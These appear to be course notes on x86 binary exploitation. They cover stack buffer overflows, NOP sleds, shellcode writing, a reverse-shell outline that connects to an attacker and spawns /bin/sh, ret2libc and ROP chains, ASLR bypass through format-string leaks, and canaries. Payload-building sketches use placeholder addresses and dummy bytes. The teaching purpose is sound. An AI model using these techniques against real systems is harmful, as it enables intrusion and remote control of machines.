Contents
- Basic Concepts
- ELF (9/10)
- C Language (9/10)
- Memory (9/15)
- Process Address Space (9/15)
- Process Execution (9/15)
- Registers (9/17)
- x86 Instructions (9/24)
- Exploitation Tools (9/24)
- Control-Flow Hijacking (9/22)
- Code Injection
- NOP Sled (9/29)
- jmp %esp (9/29)
- Register Spring (9/29)
- Shellcode Development
- Shellcode (10/1)
- Writing Shellcode (10/1)
- Reverse Shell (10/6)
- Non-Executable Memory | Code Reuse
- Non-Executable Memory (10/8)
- mprotect (10/8)
- system (10/15)
- ret2libc Chain (10/15)
- Partial ASLR | Return-Oriented Programming
- Address Space Layout Randomization (10/20)
- Dynamic Linking (10/27)
- Return-Oriented Programming (10/27)
Basic Concepts
ELF
ELF (Executable and Linkable Format) is a binary file format. It is the standard format for UNIX-like systems.
An ELF file can represent an executable, a shared library, an object file, or a core dump.
- An executable (EXEC) is a linked program with an entry point that eventually calls main
- An object file (REL) is a compiled C file that is not linked yet
- A static library is an archive of object files that is statically linked in, which means that its code is included as a big blob in the executable
- A dynamic shared library (DYN) is linked in at load time and has relative addresses (e.g. libc)
ELF file contents:
- The header contains metadata about the file, such as the type of file (executable, shared library, etc.), the architecture it is intended for, and the entry point address.
- The section header table describes the sections in the file, such as:
  - .text: executable code
  - .data: initialized global data
  - .bss: uninitialized global data
  - .rodata: read-only global data, such as string literals
- The program header table describes the segments, which are loaded into memory when the program is run. A segment can contain multiple sections.

readelf is a useful utility for examining the contents of ELF files. Run it with readelf -e <file> to print the file header, section headers, and program headers.
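As a rough illustration of the header metadata described above, here is a minimal sketch that decodes the first few fields of a 32-bit little-endian ELF header. The function name and the sample header bytes are made up for this example; only the field layout comes from the ELF format.

```python
import struct

# e_type values defined by the ELF format
ELF_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}

def parse_elf_header(data: bytes) -> dict:
    """Decode a few fields from the start of a 32-bit little-endian ELF header."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = data[4]                      # 1 = 32-bit, 2 = 64-bit
    # e_type and e_machine (16 bits each) follow the 16-byte e_ident array,
    # then e_version and e_entry (32 bits each in a 32-bit ELF).
    e_type, e_machine, _version, e_entry = struct.unpack_from("<HHII", data, 16)
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(ei_class, "unknown"),
        "type": ELF_TYPES.get(e_type, "other"),
        "machine": e_machine,               # 3 = Intel 80386
        "entry": hex(e_entry),
    }

# Hypothetical header: 32-bit x86 executable with entry point 0x8049000
header = (b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
          + struct.pack("<HHII", 2, 3, 1, 0x8049000))
print(parse_elf_header(header))
```

On a real binary, readelf -h <file> reports the same fields.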
C Language
C compilation process:
- The C preprocessor takes the source code (.c) and preprocesses it by inserting the contents of header files (#include), expanding macros (#define), and handling conditional compilation directives (#if, #else). This produces an intermediate file (.i).
- The C compiler takes the intermediate file and converts it to architecture-specific assembly (.s). In GCC, the code goes from the AST (GENERIC), to the next IR (GIMPLE), then to SSA (static single assignment) form, and finally to the assembly code.
- The assembler takes the assembly file, converts the assembly to machine code, and produces an object file (.o).
- The linker takes one or more object files and combines them into a single executable file.
- The loader loads the executable into memory and prepares it for execution. It sets up the necessary memory segments, resolves dynamic links (if any), and transfers control to the program's entry point (typically _start, which eventually calls the main function).
Note that in this process, the object files and the final executable are ELF files.
C constructs:
- extern means external to the compilation unit
- static means internal to the compilation unit, so you cannot access it from other compilation units
C data types:
| Type | Size | Value |
|---|---|---|
| void | N/A | No value |
| char | 1 byte | Character |
| short | 2 bytes | Integer |
| int | 4 bytes | Integer |
| long | 4 bytes* | Integer |
| long long | 8 bytes | Integer |
| float | 4 bytes | Floating-point number |
| double | 8 bytes | Floating-point number |
| long double | 12 bytes* | Floating-point number |
| pointer | 4 bytes* | Address |

*These sizes are for 32-bit x86 Linux. On 64-bit x86 Linux, long and pointer are typically 8 bytes, and long double is 16 bytes.
Memory
Memory is referenced by address, whose granularity and size depend on the architecture. In x86, every byte (8 bits) of memory has its own address. In 32-bit systems, an address is 32 bits (4 bytes) long, and in 64-bit systems, an address is 64 bits (8 bytes) long.
This means that in x86 32-bit systems, there are 2^32 bytes = 4 GB of addressable memory. On Linux, around 1 GB is dedicated to the kernel and 3 GB is dedicated to userland.

Memory is allocated by the kernel. The granularity of allocatable memory also depends on the architecture. Linux allocates memory in pages, which are typically 4 KB in size. This matters because permission bits can only be set at the page level.
Virtual addresses are used for both resource management and process isolation. To translate virtual addresses to physical addresses, the operating system maintains a set of page tables for each process. The hardware walks these tables and caches recent translations in the TLB (translation lookaside buffer).
TLDR: Addressable memory has a granularity of 1 byte, but allocatable memory has a granularity of 4 KB.
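The two granularities can be made concrete with a little arithmetic. This is a small sketch assuming 4 KB pages; the helper names and the sample address are illustrative only.

```python
PAGE_SIZE = 4096  # 4 KB pages, as assumed in these notes

def split_address(addr: int) -> tuple:
    """Return (page number, offset within the page) for a virtual address."""
    return addr // PAGE_SIZE, addr % PAGE_SIZE

def pages_needed(size: int) -> int:
    """Number of whole pages required to hold `size` bytes."""
    return (size + PAGE_SIZE - 1) // PAGE_SIZE

address_space_gib = 2**32 // 2**30      # 32-bit addresses, one per byte
page, offset = split_address(0xBFFFFDB0)
print(address_space_gib, hex(page), hex(offset), pages_needed(5000))
```

Even a 1-byte allocation costs a full page, and every byte in that page shares the same permission bits.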
Process Address Space
A process is a running instance of a program. Each process has its own virtual address space. On 32-bit Linux, 1 GB is dedicated to kernel mappings and 3 GB is dedicated to userland.
The stack grows from high addresses to low addresses, but data structures inside the stack (such as buffers) are read and written from low addresses to high addresses. The heap grows from low addresses to high addresses.
For a non-PIE executable, the mmap region is the only region with DYN (dynamically linked) memory. It also has its own mmap heap.

Process Execution
The operating system reads the ELF file and does the following:
- Calculate the number of pages needed for the process
- Carve the address space into page-aligned segments with permissions
- Copy allocatable bytes from the ELF file into the address space
- If there is no INTERP program header, jump to the entry point of the main ELF file.
- If there is an INTERP program header, map the ELF file that it names (the program interpreter) into the mmap region and jump to its entry point.
From then on, the operating system is done.
The INTERP program header names the program interpreter, which is the dynamic linker that loads the binary's dynamically linked libraries. For the main ELF file, readelf shows the INTERP entry like this: [Requesting program interpreter: /lib/ld-linux.so.2].
ld.so is a special helper that loads all other libraries into memory. Similar to the operating system, ld.so maps each required dynamically loaded library, like libc.so, into the mmap region of memory, and then jumps to the entry point of the main program.
Registers
x86 has 8 general-purpose registers (EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP) and two special-purpose registers (EFLAGS and EIP).
- %eip points at the next instruction to be executed
- %esp points at the top of the stack
- %eax contains the return value of functions
- %ebp points at the base of the current stack frame

x86 Instructions
The x86 instruction set (ISA) is variable length, which makes it more difficult to decode instructions.
The ISA can be presented with either AT&T syntax or IA-32 ASM (Intel) syntax, but AT&T syntax is more common in UNIX-like systems.
For example, mov %eax, %ebx in AT&T syntax (source first) is mov ebx, eax in Intel syntax (destination first). Both copy EAX into EBX.
| Symbol | Meaning |
|---|---|
| %eax | Register |
| $100 | Constant (immediate) |
| 0x100 | Memory at address 0x100 |
| (%eax) | Memory at the address held in the register |
| offset(base, index, multiplier) | Memory at address offset + base + index * multiplier |
x86 uses little-endian format, which means that the least significant byte is stored at the lowest memory address.
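Both the byte order and the operand arithmetic are easy to check by hand. The sketch below uses made-up values (the address 0x0804a010 and a %ebp of 0xbffffdb8 are hypothetical) and a helper name invented for this example.

```python
import struct

# Little-endian: the least significant byte is stored first (lowest address).
packed = struct.pack("<I", 0x0804A010)
print(packed.hex())

def effective_address(offset, base, index=0, multiplier=1):
    """Address named by the AT&T operand offset(base, index, multiplier), wrapped to 32 bits."""
    return (offset + base + index * multiplier) & 0xFFFFFFFF

# -0xc(%ebp) with a hypothetical %ebp of 0xbffffdb8
local_var = effective_address(-0xC, 0xBFFFFDB8)
# 0x10(%ebx,%esi,4) with hypothetical %ebx = 0x1000 and %esi = 3
array_slot = effective_address(0x10, 0x1000, 3, 4)
print(hex(local_var), hex(array_slot))
```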
Stack Frame
To initiate a function call, the caller executes call <addr>, which:
- Computes the return address, which is the address of the next instruction after the call
- Pushes the return address onto the stack in little endian
- Loads %eip with the call target <addr>
To set up the new stack frame, the callee has a prologue (enter), which:
- Pushes the old %ebp onto the stack
- Sets the base pointer to the current top of the stack
- Grows the stack down to allocate space for local variables
push %ebp
mov %esp,%ebp
sub $0x218,%esp
To remove a stack frame, the callee has an epilogue (leave), which:
- Copies %ebp to %esp
- Pops the saved %ebp from the stack back into %ebp
mov %ebp, %esp
pop %ebp
To transfer control back to the caller, the callee executes ret, which:
- Pops the return address from the top of the stack
- Loads %eip with the return address
- Resumes execution at the new %eip value

Parameters and local variables are referenced relative to the base pointer %ebp. Positive offsets mean that you are accessing parameters, and negative offsets mean that you are accessing local variables. For example, 0x8(%ebp) is the first parameter (the saved %ebp and the return address sit in between), and -0xc(%ebp) is a local variable 12 bytes below %ebp.
Parameters are pushed onto the stack in reverse order. For example, the read function takes 3 parameters: int fd, void* buf, and size_t nbytes. The assembly code to set up the call read(0, buf, 0x40) looks like this:
push $0x40
lea -0x18(%ebp),%eax
push %eax
push $0x0
Unlike mov, lea does not dereference its memory operand. It just computes the address and loads it into a register.
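The call, prologue, epilogue, and ret steps can be traced with a toy model. This is only a sketch: the class, the addresses, and the frame size are invented for illustration, and memory is modeled as a dictionary of 4-byte slots rather than real bytes.

```python
class Stack32:
    """Toy model of a 32-bit stack: maps an address to the 4-byte value stored there."""

    def __init__(self, esp):
        self.mem, self.esp, self.ebp, self.eip = {}, esp, 0, 0

    def push(self, value):
        self.esp -= 4                 # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def call(self, target, return_addr):
        self.push(return_addr)        # call pushes the return address...
        self.eip = target             # ...and loads %eip with the target

    def prologue(self, locals_size):
        self.push(self.ebp)           # push %ebp
        self.ebp = self.esp           # mov %esp,%ebp
        self.esp -= locals_size       # sub $locals_size,%esp

    def epilogue_and_ret(self):
        self.esp = self.ebp           # mov %ebp,%esp
        self.ebp = self.pop()         # pop %ebp
        self.eip = self.pop()         # ret

cpu = Stack32(esp=0xBFFFF000)
cpu.ebp = 0xBFFFF040                  # caller's frame pointer (made-up value)
cpu.push(0x40)                        # one argument, pushed by the caller
cpu.call(target=0x08049100, return_addr=0x08049205)
cpu.prologue(locals_size=0x218)
return_slot = cpu.ebp + 4             # return address sits just above the saved %ebp
first_param = cpu.ebp + 8             # first parameter is at 0x8(%ebp)
cpu.epilogue_and_ret()
```

After epilogue_and_ret, %eip holds whatever was stored in return_slot, which is exactly the value a stack overflow aims to replace.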
Exploitation Tools
Terminal commands
- as --32 program.s -o program.o assembles in 32-bit.
- cc -m32 program.c -o program compiles in 32-bit.
- ldd prints the shared libraries required by each program.
- objdump -d <exec> disassembles executable files.
- readelf -s <file> or nm <file> lists symbols from object files.
GDB
- info proc mappings prints the memory mappings of the current process
- disassemble main disassembles the main function
- b *addr sets a breakpoint at the given address
- si steps one instruction
- printf "%x\n", $ebp+0x8 prints addresses
- x/x 0xbffffdb0 examines memory
- x/i system examines memory as instructions
Control-Flow Hijacking
Control-flow hijacking is the exploitation of memory vulnerabilities to change the control flow of a program.
This is commonly done using stack buffer overflows. The stack contains return addresses that are automatically pushed by the CPU during a call. Because this control data sits next to local buffers, an overflow that overwrites a saved return address redirects execution when the function returns.
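The shape of such an overflow input can be sketched as follows. The buffer distance and the target address are hypothetical; in practice they come from disassembling the vulnerable function.

```python
import struct

def overflow_payload(buf_to_ret: int, new_ret: int) -> bytes:
    """Filler up to the saved return address, then the replacement address in little endian."""
    return b"A" * buf_to_ret + struct.pack("<I", new_ret)

# Hypothetical frame: the buffer starts 0x18 bytes below %ebp,
# and the saved %ebp takes another 4 bytes before the return address.
payload = overflow_payload(buf_to_ret=0x18 + 4, new_ret=0x08049196)
print(len(payload), payload[-4:].hex())
```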
Code Injection
Stack jitter refers to how much stack addresses change across runs because environment variables and command-line arguments, whose sizes vary, are placed at the top of the stack. This makes it unreliable to hardcode a stack address as the new return address.
This problem can be mitigated by NOP sleds and jmp %esp.
NOP Sled
NOP sleds are sequences of NOP instructions (0x90) that slide the execution flow into the shellcode. They let the exploit compensate for the shellcode landing at slightly different addresses due to different environment variables. However, they do not entirely mitigate stack jitter, because you still need to guess an address inside the NOP landing pad, which is a specific stack address.
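One common layout places the sled and shellcode inside the buffer and points the return address at a guess somewhere in the sled. The sketch below assumes that layout; the sizes, the guessed address, and the placeholder bytes standing in for shellcode are all made up.

```python
import struct

NOP = b"\x90"

def nop_sled_payload(shellcode: bytes, buf_to_ret: int, guess: int, sled_len: int) -> bytes:
    """[NOP sled][shellcode][filler][return address guess pointing into the sled]."""
    body = NOP * sled_len + shellcode
    if len(body) > buf_to_ret:
        raise ValueError("sled and shellcode do not fit below the return address")
    return body.ljust(buf_to_ret, b"A") + struct.pack("<I", guess)

placeholder = b"\xcc" * 8             # int3 bytes standing in for real shellcode
payload = nop_sled_payload(placeholder, buf_to_ret=0x21C, guess=0xBFFFFC40, sled_len=256)
```

A longer sled tolerates more jitter: any guess that falls within sled_len bytes of the sled's start still reaches the shellcode.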

jmp %esp
In the jmp %esp technique, the return address is overwritten with the address of a jmp %esp instruction (ff e4). When ret executes, it pops the return address into %eip, which increments %esp by 4 bytes so that %esp points just past the overwritten return address. The jmp %esp then jumps to the top of the stack, where the shellcode is located. Note that the exploiter needs to be able to write beyond the return address.
This reliably mitigates stack jitter because there is no need to guess a specific stack address. Control always transfers to wherever %esp currently points.
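A minimal sketch of the two pieces involved: locating the ff e4 byte pair in some code bytes, and laying out the input so the shellcode sits right after the overwritten return address. The code bytes, load address, and sizes are hypothetical, and the shellcode is a placeholder.

```python
import struct

JMP_ESP = b"\xff\xe4"

def find_jmp_esp(code: bytes, load_addr: int):
    """Return the address of the first ff e4 byte pair in `code`, or None if absent."""
    offset = code.find(JMP_ESP)
    return None if offset < 0 else load_addr + offset

def jmp_esp_payload(buf_to_ret: int, jmp_esp_addr: int, shellcode: bytes) -> bytes:
    """[filler][address of jmp %esp][shellcode]: after ret, %esp points at the shellcode."""
    return b"A" * buf_to_ret + struct.pack("<I", jmp_esp_addr) + shellcode

code = bytes.fromhex("5589e5ffe4c3")  # made-up bytes containing ff e4 at offset 3
addr = find_jmp_esp(code, load_addr=0x08048000)
payload = jmp_esp_payload(0x1C, addr, b"\xcc" * 4)   # int3 placeholders
```

The byte pair does not have to be an intended instruction; any executable, non-randomized location containing ff e4 works.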

Register Spring
A register spring uses any instruction that jumps to a register, such as jmp %eax or call %ebx. It is less constrained than jmp %esp because any register that points into attacker-controlled data at the time of the hijack can be used.
This reliably mitigates stack jitter because it always transfers control to the location pointed to by a specific register.
Shellcode Development
Shellcode
Shellcode is attacker-supplied machine code that is injected into memory the attacker controls and executed by exploiting a memory corruption vulnerability.
Reverse shellcode connects back to the attacker's machine and gives the attacker a shell. Anything the attacker types is executed on the victim's machine, and anything the victim's machine outputs is sent back to the attacker.
Bind shellcode listens on a port and gives the attacker a shell when they connect to that port.
Writing Shellcode
Write the assembly. Assemble it. Then disassemble it to get the opcodes. A nice one-liner is as --32 program.s -o program.o && objdump -d program.o.
Each system call has a mapping between its arguments and registers. To make a system call on 32-bit Linux, put its syscall number in %eax and its arguments in %ebx, %ecx, %edx, %esi, %edi, and %ebp, in that order. Then invoke int $0x80. The return value will be in %eax.
Avoid null bytes (0x00). They can terminate strings early in functions like strcpy().
Tricks to remove null bytes:
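- Instead of mov $0x0, xor registers with themselves (e.g., xor %eax, %eax)
- pushw can sometimes optimize out 00. For example, pushw $0x0012 assembles to \x66\x6a\x12 instead of \x66\x68\x12\x00. This works for values up to 7f.
- Because /bin/sh is 7 bytes, there will be a null byte of padding at the end when it is pushed as two 4-byte words. You can instead push /bin//sh, which is 8 bytes and names the same file.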
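Two of these checks are mechanical enough to script. The sketch below (helper names are made up) tests opcode bytes for null bytes and computes the 32-bit immediates needed to push /bin//sh onto the stack.

```python
import struct

def has_bad_bytes(code: bytes, bad: bytes = b"\x00") -> bool:
    """True if any byte of `code` appears in `bad`."""
    return any(b in bad for b in code)

def push_words(s: bytes) -> list:
    """Split `s` (length a multiple of 4) into 32-bit immediates, in the order to push them."""
    if len(s) % 4 != 0:
        raise ValueError("length must be a multiple of 4")
    words = [struct.unpack("<I", s[i:i + 4])[0] for i in range(0, len(s), 4)]
    return [hex(w) for w in reversed(words)]   # the last chunk is pushed first

mov_zero = bytes.fromhex("b800000000")         # mov $0x0,%eax
xor_self = bytes.fromhex("31c0")               # xor %eax,%eax
print(has_bad_bytes(mov_zero), has_bad_bytes(xor_self))
print(push_words(b"/bin//sh"))
```

The string still needs a terminator on the stack; a usual approach is to push a register that was zeroed with xor before pushing the two words.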
It might also be necessary to reduce payload size.
Tricks to reduce shellcode size:
- In mov, use the smallest register necessary (e.g., %al instead of %eax for a 1-byte value)
You can also look for strings in the .rodata section instead of pushing them byte by byte:
- Find the file offset of the string in the binary with strings -t x <file> | grep <string>
strings -t x exec | grep string
3008 string
- Find the address and file offset of the .rodata section using readelf -S <file> | grep .rodata
readelf -S exec | grep .rodata
[15] .rodata PROGBITS 0bf07000 003000 0001b2 00 A 0 0 4
- Calculate the address of the string by adding the offset of the string within .rodata to the address of the .rodata section
0bf07000 + (3008 - 3000) = 0bf07008
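The same calculation as a small helper, using the values from the strings and readelf output above (the function name is made up for this sketch):

```python
def string_address(section_addr: int, section_offset: int, string_offset: int) -> int:
    """Runtime address of a string, given its file offset and its section's address and file offset."""
    return section_addr + (string_offset - section_offset)

addr = string_address(section_addr=0x0BF07000, section_offset=0x3000, string_offset=0x3008)
print(hex(addr))
```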
Reverse Shell
On the compromised machine, the shellcode:
- Creates a socket
- Changes stdin, stdout, and stderr to the socket
- Connects to the attacker's machine
- Executes
/bin/sh
int sfd = socket(PF_INET, SOCK_STREAM, 0); // TCP socket
dup2(sfd, 2); // stderr
dup2(sfd, 1); // stdout
dup2(sfd, 0); // stdin
connect(sfd, (struct sockaddr *)&sin, sizeof(sin)); // sin holds the attacker's IP and port
execve("/bin/sh", NULL, NULL);
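The sin structure passed to connect has a fixed 16-byte layout, which matters when it has to be built by hand on the stack. The following sketch packs it the way it appears in memory on little-endian Linux; the IP address and port are hypothetical lab values.

```python
import socket
import struct

def pack_sockaddr_in(ip: str, port: int) -> bytes:
    """Lay out a 16-byte struct sockaddr_in as stored in memory on little-endian Linux."""
    family = struct.pack("<H", socket.AF_INET)   # sin_family, host byte order
    port_be = struct.pack(">H", port)            # sin_port, network (big-endian) byte order
    addr = socket.inet_aton(ip)                  # sin_addr, network byte order
    return family + port_be + addr + bytes(8)    # sin_zero padding

sin = pack_sockaddr_in("10.0.2.15", 4444)        # hypothetical address and port
print(sin.hex())
```

Note that sin_family and many IP addresses contain null bytes, so the null-byte tricks from the previous section apply when these values are pushed.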
Non-Executable Memory | Code Reuse
Non-Executable Memory
Around the early 2000s, computers started to implement non-executable memory to mitigate code injection attacks. Pages now had 3 permission bits:
- Present (P)
- Read/write (R/W)
- Executable (X), implemented on x86 as the no-execute (NX) bit
However, the return address can still be overwritten to point to existing code in the program or libraries. This exploit is called code reuse, ret2libc, or whole function reuse.
mprotect
mprotect is a function in libc that can set the protection on a region of memory.
- Add parameters for mprotect to make the stack executable
- Add shellcode where mprotect will return
- Hijack the control flow to mprotect
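The stack words for these three steps can be sketched as below. mprotect takes (addr, len, prot), and addr must be page-aligned, so the shellcode address is rounded down to its page. Both addresses are hypothetical; real ones come from the target's libc and stack.

```python
import struct

PAGE_SIZE = 0x1000
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4       # values from <sys/mman.h> on Linux

def mprotect_frame(mprotect_addr: int, shellcode_addr: int, length: int = PAGE_SIZE) -> bytes:
    """Words that replace the return address: mprotect, its return address, then its 3 arguments."""
    page = shellcode_addr & ~(PAGE_SIZE - 1)     # round down to the start of the page
    prot = PROT_READ | PROT_WRITE | PROT_EXEC
    return struct.pack("<5I", mprotect_addr, shellcode_addr, page, length, prot)

# Hypothetical addresses of mprotect in libc and of shellcode on the stack
frame = mprotect_frame(0xB7E9A4F0, 0xBFFFF5A0)
words = struct.unpack("<5I", frame)
print([hex(w) for w in words])
```

If the shellcode straddles a page boundary, length needs to cover both pages. The small len and prot values also contain null bytes, which matters for string-based overflows.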
system
system is a function in libc that executes a string as a command.
- Add the string /bin/sh somewhere in memory
- Add the address of /bin/sh as a parameter to system
- Hijack the control flow to system
ret2libc Chain
We can also call multiple functions in a row through a ret2libc chain. At each link, we need to push the following (in memory, from low to high addresses, they end up in the reverse order):
- The arguments to the function
- The return address of the function
- The address of the function to call
The return address of the function should be a gadget that lifts the stack past the arguments to the next function's address (e.g., pop; pop; ret for two arguments) and then executes ret.
If a function argument is a pointer, make sure that it does not point into the stack region that will be overwritten by new stack frames.
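A chain like this can be assembled mechanically. In the sketch below every address is hypothetical: two libc functions, plus gadgets that pop one or three words and then ret. The helper name and the final return value are also invented for illustration.

```python
import struct

def build_chain(links, final_ret=0xDEADBEEF) -> bytes:
    """Each link is (function address, cleanup gadget address, list of arguments)."""
    out = b""
    for func, cleanup, args in links:
        # In memory order: the function, where it returns to, then its arguments.
        out += struct.pack("<II", func, cleanup)
        out += b"".join(struct.pack("<I", a) for a in args)
    return out + struct.pack("<I", final_ret)

POP_RET, POP3_RET = 0x0804901E, 0x08049219       # made-up gadget addresses
payload = build_chain([
    (0xB7E9A4F0, POP3_RET, [0xBFFFF000, 0x1000, 7]),   # e.g. mprotect(page, len, rwx)
    (0xB7E42DA0, POP_RET, [0xBFFFF6C0]),               # e.g. system(pointer to a string)
])
chain_words = struct.unpack("<9I", payload)
```

The cleanup gadget must pop exactly as many words as the function has arguments, so that its ret consumes the next function's address.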

Partial ASLR | Return-Oriented Programming
Address Space Layout Randomization
Address space layout randomization (ASLR) is a probabilistic defense that randomizes the base addresses of parts of the address space.
Partial ASLR randomizes the stack, mmap, and heap. Full ASLR also randomizes the main executable.
Constraints:
- Stack needs to be 16-byte aligned (19 bits of entropy)
- mmap needs to be 4 KB aligned (8 bits of entropy)
- brk needs to be 4 KB aligned (13 bits of entropy)
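To get a feel for what these entropy figures mean for a brute-force guess, the sketch below converts bits into a count of possible base addresses, using the numbers from the list above.

```python
ENTROPY_BITS = {"stack": 19, "mmap": 8, "brk": 13}   # figures from the list above

def positions(region: str) -> int:
    """Number of equally likely base addresses for a region."""
    return 2 ** ENTROPY_BITS[region]

for region in ENTROPY_BITS:
    # If the layout is re-randomized on every attempt, each guess succeeds with
    # probability 1/positions, so the expected number of attempts equals positions.
    print(f"{region}: {positions(region)} possible bases")
```

With only 256 possibilities, the mmap region (and therefore libc) is the weakest of the three on 32-bit systems.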
Dynamic Linking
Dynamic linking relies on two tables:
- The global offset table (GOT) contains the addresses of external functions and global variables
- The procedure linkage table (PLT) contains stubs that jump to the addresses in the GOT
Here is the process of calling an external function:
- An external function is called from the .text section through its .plt stub.
bf06327: e8 14 2d 14 fc call 8049040 <read@plt>
- The .plt stub is a set of three instructions, which starts with a jump to an address in the GOT.
08049040 <read@plt>:
8049040: ff 25 4c 84 f0 0b jmp *0xbf0844c
8049046: 68 08 00 00 00 push $0x8
804904b: e9 d0 ff ff ff jmp 8049020 <_init+0x20>
If the function is being called for the first time, the GOT slot just points to the next instruction in the PLT stub, which pushes the function index and jumps to the dynamic linker.
If the function has been called before, the GOT slot points to the actual function address.
Only functions used in the binary have PLT stubs. PLT addresses are not randomized by partial ASLR because they are part of the main executable.
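The raw bytes in the disassembly above can be decoded by hand to confirm where each instruction goes. This sketch (helper names are invented) handles the two encodings that appear there: a 5-byte call or jmp with a relative displacement, and the 6-byte indirect jmp through a GOT slot.

```python
import struct

def rel32_target(insn_addr: int, insn_bytes: bytes) -> int:
    """Target of a 5-byte call (e8) or jmp (e9) with a 32-bit relative displacement."""
    if len(insn_bytes) != 5 or insn_bytes[0] not in (0xE8, 0xE9):
        raise ValueError("expected e8/e9 followed by a 4-byte displacement")
    (disp,) = struct.unpack("<i", insn_bytes[1:])      # signed, little-endian
    return (insn_addr + 5 + disp) & 0xFFFFFFFF         # relative to the next instruction

def got_slot(insn_bytes: bytes) -> int:
    """GOT slot address used by a 6-byte 'jmp *addr' (ff 25) PLT entry."""
    if len(insn_bytes) != 6 or insn_bytes[:2] != b"\xff\x25":
        raise ValueError("expected ff 25 followed by a 4-byte address")
    return struct.unpack("<I", insn_bytes[2:])[0]

call_target = rel32_target(0x0BF06327, bytes.fromhex("e8142d14fc"))   # call read@plt
slot = got_slot(bytes.fromhex("ff254c84f00b"))                        # jmp *GOT slot
plt0 = rel32_target(0x0804904B, bytes.fromhex("e9d0ffffff"))          # jmp to the first PLT entry
print(hex(call_target), hex(slot), hex(plt0))
```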
Return-Oriented Programming
A gadget is a sequence of instructions that ends with a ret. Return-oriented programming (ROP) involves chaining gadgets together to perform arbitrary computation. Often, this involves setting up the stack frame above the original return address.
To find unaligned gadgets, search for ret (c3) bytes. Then, backtrack a few bytes to find useful instructions. One tool that does this automatically is ROPgadget.
For partial ASLR, we can use ROP to set up arguments, particularly if they are memory addresses. Then we can call functions in the PLT, which is not randomized.
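The search-and-backtrack idea can be sketched in a few lines. This is not how ROPgadget is implemented; it only enumerates byte windows that end in c3, which would still need to be disassembled. The code bytes and base address are made up.

```python
RET = 0xC3

def gadget_candidates(code: bytes, base: int, max_back: int = 3):
    """Yield (address, raw bytes) for every byte window that ends in a ret (c3)."""
    for i, byte in enumerate(code):
        if byte != RET:
            continue
        for back in range(max_back + 1):
            start = i - back
            if start >= 0:
                yield base + start, code[start:i + 1]

code = bytes.fromhex("5b5e5fc3")      # pop %ebx; pop %esi; pop %edi; ret
found = dict(gadget_candidates(code, base=0x08049216))
for addr, raw in sorted(found.items()):
    print(hex(addr), raw.hex())
```

Starting one byte later in the same sequence yields a shorter gadget (pop; pop; ret, then pop; ret), which is why a single function epilogue often provides several usable gadgets.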

Full ASLR | Just-In-Time Code Reuse
Full ASLR
Full ASLR randomizes the main executable in addition to everything that the partial ASLR randomizes. To have full ASLR, the main executable must not contain any absolute addresses; i.e. it must be position-independent code (PIC).
An executable with full ASLR is a DYN (Position-Independent Executable file). This is slightly different from library files, which are DYN (Shared object file).
Memory Disclosure
In a format string, each %x prints the next value from the stack and interprets it as hexadecimal. When the attacker controls the format string, this can be exploited to read the return address, creating a memory disclosure vulnerability.
printf("XXXX %x %x %x %x");
In practice, putting too many %x in the input string can make the input long enough to overwrite the return address before we get to read it. Instead, we should use the %N$x notation, which reads the Nth stack location directly.
printf("%138$x")
Just-In-Time Code Reuse
- Get the return address through a memory disclosure vulnerability.
- Calculate the base address of the main executable by subtracting the offset of the return address from the leaked return address. In other words, base addr = return addr - offset. We can find this offset using info proc mappings in GDB.
- Calculate the addresses of gadgets and functions in the main executable. Note that gadgets must be taken from the main executable, not from libraries. Gadgets and functions will have fixed offsets from the base address, given by readelf -e <executable>.
- Use a ROP chain to call functions in the PLT once again.

Note that GDB disables ASLR by default. To enable it, run set disable-randomization off.
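The address arithmetic in the steps above is simple enough to sketch. All numbers here are hypothetical: a leaked return address, its known offset inside the executable, and the offsets of one PLT stub and one gadget.

```python
def rebase(leaked_ret: int, ret_offset: int, offsets: dict) -> dict:
    """Turn offsets within the executable into runtime addresses using one leaked return address."""
    base = leaked_ret - ret_offset                # base addr = return addr - offset
    return {name: base + off for name, off in offsets.items()}

addrs = rebase(
    leaked_ret=0x5657B2A4,
    ret_offset=0x12A4,
    offsets={"read@plt": 0x1040, "pop_ret": 0x101E},
)
print({name: hex(a) for name, a in addrs.items()})
```

A quick sanity check is that the computed base is page-aligned; if it is not, the leaked value or the offset is probably wrong.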
Stack Canaries/Cookies
Stack Canaries
A stack canary is a tripwire defense against return address overwrites. In particular, it defends against contiguous spatial memory violations in the stack. This defense needs to be enabled by the compiler.
The canary is a random 4-byte value that is placed in the stack frame of the protected function, between the local variables and the saved %ebp and return address. A master copy of the canary is kept at a location that is hard to predict; on 32-bit Linux with glibc, it lives in thread-local storage and is read through a segment register (%gs:0x14). When the function returns, the epilogue checks that the canary in the stack frame matches the master copy. If the canary matches, we can assume that all values above the canary in the stack frame are intact.

Note that this defense is not effective if there is a memory disclosure vulnerability that allows the attacker to read the canary value.
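The tripwire behavior, and why a leak defeats it, can be shown with a toy frame. Everything here is a simplified model: the frame layout helper, the 16-byte buffer, and the fixed canary value are made up (a real canary is random per process).

```python
import struct

BUF_SIZE = 16

def make_frame(canary: bytes) -> bytearray:
    """[buffer][canary][saved %ebp][return address], from low to high addresses."""
    return bytearray(BUF_SIZE) + canary + struct.pack("<II", 0xBFFFF040, 0x08049205)

def write_buffer(frame: bytearray, data: bytes) -> None:
    """Unchecked copy into the buffer, like strcpy: it may run past BUF_SIZE."""
    frame[:len(data)] = data

def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """The comparison the epilogue performs before returning."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 4]) == canary

master = bytes.fromhex("00a1b2c3")               # made-up canary value

frame = make_frame(master)
write_buffer(frame, b"A" * 28)                   # contiguous overflow up to the return address
detected = not canary_intact(frame, master)

frame = make_frame(master)
new_ret = struct.pack("<I", 0x08049196)
write_buffer(frame, b"A" * 16 + master + b"BBBB" + new_ret)   # attacker knows the canary
bypassed = canary_intact(frame, master) and bytes(frame[-4:]) == new_ret
```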
x86 Segmentation
The memory management unit (MMU) has a segmentation unit and a paging unit. The segmentation unit divides memory into chunks (segments) and can run processes in separate segments. The global descriptor table (GDT) is a data structure in the kernel that contains a segment descriptor for each segment. Each segment descriptor describes the segment's base address and limit.
